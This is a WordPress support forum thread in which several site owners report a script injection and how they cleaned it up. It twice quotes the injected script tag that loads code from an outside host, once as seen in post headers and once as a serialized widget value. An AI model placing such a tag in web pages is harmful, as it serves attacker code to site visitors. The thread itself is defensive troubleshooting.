[resolved] Unwanted java scripts added to posts (10 posts)

  1. dewetvanrensburg
    Posted 3 years ago #

    For the past week I receive warnings on a site I have been running for over a year.
    When visiting the site, in chrome, it's promts me that 'java needs my permission to run'
    Thereafter, I receive a security warning : "The application's digital signature cannot be verified. Do you want to run the application?'

    When logging into the dashboard, some of my posts had unwanted scripts in the Header :
    <script type="text/javascript" src="http://chezbruna.com.br/imagens/rebots.php"></script>

    I removed the unwanted scripts from the posts, but I still get the prompts and warnings - what do I do next?

  2. s_ha_dum
    Posted 3 years ago #

    Sounds like you've been hacked.

    FAQ: My Site Was Hacked

    That chezbruna site is not a WordPress site, so I am guessing that isn't your domain?

  3. waldito
    Posted 3 years ago #

    Same problem here, just a few hours ago this thing 'started' on my site too: alaputacalle.com

  4. MickeyRoush
    Posted 3 years ago #

  5. waldito
    Posted 3 years ago #

    Yes. I already been there before coming here. Still, it puzzles me how they have done it. So far, templates are clean, and php files are clean. That Iframe that appears on my template... is somehow inserted vía javascript or something.

    My knowledge is quite limited!

    So far ran three diferent antivirus plugins, no luck finding 'the sting'. It may be on the MySQL database...

  6. waldito
    Posted 3 years ago #

    It was there indeed... I found it on wp_options as a text widget.

    ";s:4:"text";s:91:"<script type="text/javascript" src="http://chezbruna.com.br/imagens/rebots.php"></script>

    I couldn't figure out how they were loading that text widget on my theme yet.

  7. dewetvanrensburg
    Posted 3 years ago #

    I also found all mine (I hope).

    Most were just added to my post headings, but found a sneaky one in a text widget.
    I am changing my passwords all over just to be a little more protected.

  8. s_ha_dum
    Posted 3 years ago #

    Finding the symptom, the script that was output, does not mean that you have found the problem. Something on your sites is vulnerable. Removing the nasty Javascript doesn't remove the vulnerability that let the code get put on the site in the first place. Please follow all of the instructions in the Hacked Faq-- FAQ: My Site Was Hacked

  9. RugaCH
    Posted 3 years ago #

    My site was affected too - it started last night.
    It's a huge coincidence that all are affected by the same injection - maybe a vulnerability in WP?

  10. aleflocco
    Posted 3 years ago #


    I had the same issues, than I installed a login log plugin (I used this, http://wordpress.org/extend/plugins/simple-login-log/ ) and found that one of site administrators logged in from different places in the world (the plugin shows the IP)...

    I asked him which was his password, and it was extremely weak!
    So, as told me by our provider, the problem could be a too week login password.

    Oh, I mentioned that plugin ONLY because I used that, I have nothing to share with it or its author ;)

    Hope this helps

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.